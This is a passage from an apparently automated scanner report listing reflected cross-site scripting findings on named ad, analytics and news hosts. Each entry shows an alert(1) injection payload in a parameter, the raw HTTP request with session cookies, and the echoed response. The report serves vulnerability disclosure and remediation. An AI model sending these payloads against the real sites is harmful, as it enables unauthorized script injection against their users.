Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 143
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Date: Sat, 23 Jul 2011 04:46:29 GMT
Content-Length: 143

jsonp1311396321262({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1deba5<img src=a onerror=alert(1)>680b3dd871d"});

3.80. http://sgy.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5547'%3balert(1)//3001d813790 was submitted in the h parameter. This input was echoed as a5547';alert(1)//3001d813790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8&w=300&h=250a5547'%3balert(1)//3001d813790&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:16 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250a5547';alert(1)//3001d813790" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.81. http://sgy.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 289dd"%3balert(1)//cc9192e141b was submitted in the pid parameter. This input was echoed as 289dd";alert(1)//cc9192e141b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8289dd"%3balert(1)//cc9192e141b&w=300&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:30:51 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8289dd";alert(1)//cc9192e141b&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.82. http://sgy.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sgy.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bb2'%3balert(1)//fd0bb5244ec was submitted in the w parameter. This input was echoed as 83bb2';alert(1)//fd0bb5244ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=5F090D8&w=30083bb2'%3balert(1)//fd0bb5244ec&h=250&rnd=8141575 HTTP/1.1
Host: sgy.sitescout.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=2;tile=4;sz=300x250,1x1;frId=ad_4_2;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 21 Jul 2011 19:31:01 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://sgy.sitescout.com/disp?pid=5F090D8&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30083bb2';alert(1)//fd0bb5244ec" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

3.83. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83bc3'-alert(1)-'7568d65213a was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=83bc3'-alert(1)-'7568d65213a&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 21 Jul 2011 18:00:59 GMT
Content-Length: 1398
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:59 GMT; path=/
Set-Cookie: pubfreq_26922_21908_386505509=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:59 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:59 GMT; path=/

document.write('<div id="83bc3'-alert(1)-'7568d65213a" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=O2QAACppAACUVQAAAAAAAAAAAAAAAAAAAAAAAAAAAABjdAAApQAAANgCAABaAAAAAAAAAAEAAABFRDczODFBOC1GOUFCLTQ
...[SNIP]...

3.84. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af24a'-alert(1)-'716b9fb4375 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.5989337249714323&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 21 Jul 2011 18:00:59 GMT
Content-Length: 1469
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:00:59 GMT; path=/
Set-Cookie: pubfreq_26922_21908_131233610=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:40:59 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:00:59 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
fact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271259&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.5989337249714323&pageURL=http://www.myyearbook.com/advertising/default.phpaf24a'-alert(1)-'716b9fb4375">
...[SNIP]...

3.85. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c0d3'-alert(1)-'177d7fba2be was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25659&siteId=26922&adId=21908&kadwidth=728&kadheight=90&kbgColor=&ktextColor=&klinkColor=&pageURL=http://www.myyearbook.com/advertising/default.php&frameName=http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922&kltstamp=2011-6-21%2013%3A1%3A0&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=TribalFusion&section=None&size=728x90&site=MYB&sub=Network
Cookie: KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C; KADUSERCOOKIE=ED7381A8-F9AB-49E0-BC2C-2A944C186892; __utmz=103266945.1305207252.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=103266945.1788404461.1305207252.1305207252.1305207252.1; KRTBCOOKIE_32=1386-WH9qZFd2QnVEAmJeAgd%2FWAJUaXsQdwNPC11gUlpOZQ%3D%3D; PUBRETARGET=2114_1326806725.82_1405863486; KRTBCOOKIE_22=488-pcv:1|uid:4146544210108361256

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1469
Date: Thu, 21 Jul 2011 18:01:00 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 20-Jul-2012 18:01:00 GMT; path=/
Set-Cookie: pubfreq_26922_21908_2127498912=165-1; domain=pubmatic.com; expires=Thu, 21-Jul-2011 18:41:00 GMT; path=/
Set-Cookie: PMDTSHR=; domain=pubmatic.com; expires=Fri, 22-Jul-2011 18:01:00 GMT; path=/

document.write('<div id="http_www_myyearbook_comadvertisingdefault_phpkomli_ads_frame12565926922" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdat
...[SNIP]...
eId=26922&adId=21908&adServerId=165&kefact=0.400000&kpbmtpfact=0.000000&kadNetFrequecy=2&kadwidth=728&kadheight=90&kltstamp=1311271260&indirectAdId=29795&adServerOptimizerId=1&ranreq=0.59893372497143236c0d3'-alert(1)-'177d7fba2be&pageURL=http://www.myyearbook.com/advertising/default.php">
...[SNIP]...

3.86. http://sitelife.boston.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sitelife.boston.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 5c5f8<script>alert(1)</script>2a6b2a04253 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r={%22Requests%22%3A[{%22ArticleKey%22%3A{%22Key%22%3A%2220110723_1052263300%22}}]%2C%22UniqueId%22%3A0}&cb=bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253&noCacheIE=1311428812606 HTTP/1.1
Host: sitelife.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; RMFD=011QkcXHO1060Og; sslife=1; s_cc=true; s_pv=Lifestyle%20%7C%20Other%20%7C%20Facebook%2C%20Twitter%20obligations%20persist%20during%20vacations; s_sq=%5B%5BB%5D%5D; AxData=; Axxd=1; bcpage=6; s_ppv=27

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 878
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm104l3pluckcom
Set-Cookie: SiteLifeHost=l3vm104l3pluckcom; domain=boston.com; path=/
Date: Sat, 23 Jul 2011 13:50:16 GMT

bcOverCom5c5f8<script>alert(1)</script>2a6b2a04253({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"07/23/2011 09:46:19:067 AM"}],"Responses":[{"Article":{"ArticleKey":{"Key":"20110723_1052263300"},"Section":{"Name":"'globe story: liv'"},"
...[SNIP]...

3.87. http://sm6.sitemeter.com/js/counter.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.asp

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e038'%3balert(1)//f4ecbb39fe5 was submitted in the site parameter. This input was echoed as 7e038';alert(1)//f4ecbb39fe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.asp?site=sm6damnhippy7e038'%3balert(1)//f4ecbb39fe5 HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:19 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippy7e038';alert(1)//f4ecbb39fe5', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippy7e038';alert(1)//f4ecbb39fe5';
// ]]>
...[SNIP]...

3.88. http://sm6.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sm6.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9549'%3balert(1)//451a5745b3f was submitted in the site parameter. This input was echoed as e9549';alert(1)//451a5745b3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=sm6damnhippye9549'%3balert(1)//451a5745b3f HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:28:59 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('sm6damnhippye9549';alert(1)//451a5745b3f', 'sm6.sitemeter.com', '');

var g_sLastCodeName = 'sm6damnhippye9549';alert(1)//451a5745b3f';
// ]]>
...[SNIP]...

3.89. http://social.msdn.microsoft.com/Search/en-US [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://social.msdn.microsoft.com
Path:   /Search/en-US

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ebb6e%20a%3db2dac2458762 was submitted in the REST URL parameter 2. This input was echoed as ebb6e a=b2dac2458762 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Search/en-USebb6e%20a%3db2dac2458762?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8 HTTP/1.1
Host: social.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_NVR=0=/:1=en-us:2=en-us/vstudio

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:45 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB45
Date: Sat, 23 Jul 2011 04:47:45 GMT
ntCoent-Length: 23630
Content-Length: 23630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head
...[SNIP]...
<a id="clr_All" href=/search/en-US/en-USebb6e a=b2dac2458762?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1 >
...[SNIP]...

3.90. http://sr2.liveperson.net/visitor/addons/deploy2.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload d539f%0acb95731872f was submitted in the site parameter. This input was echoed as d539f
